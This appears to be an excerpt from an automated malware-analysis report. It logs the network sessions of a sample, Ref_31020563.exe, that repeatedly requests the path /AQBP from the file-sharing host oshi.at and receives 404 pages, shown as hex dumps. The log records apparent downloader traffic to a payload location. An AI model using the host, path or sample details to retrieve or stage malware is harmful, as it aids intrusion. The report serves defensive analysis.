                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:38 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          46192.168.2.849762194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:40 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:41 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:41 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:41 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          47192.168.2.849763194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:43 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:44 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:44 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:44 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          48192.168.2.849764194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:46 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:47 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:47 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:47 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          49192.168.2.849765194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:49 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:50 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:50 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:50 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          50192.168.2.849766194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:52 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:53 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:53 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:53 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          51192.168.2.849767194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:55 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:56 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:55 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:56 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          52192.168.2.849768194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:58 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:59 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:58 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:59 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          53192.168.2.849769194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:01 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:02 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:01 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:02 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          54192.168.2.849770194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:04 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:04 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:04 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          55192.168.2.849771194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:07 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:08 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:07 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:08 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          56192.168.2.849772194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:10 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:10 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:10 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:10 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          57192.168.2.849773194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:13 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:13 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:13 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:13 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          58192.168.2.849774194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:15 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:16 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:16 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:16 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          59192.168.2.849775194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:18 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:19 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:19 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:19 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          60192.168.2.849776194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:21 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:22 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
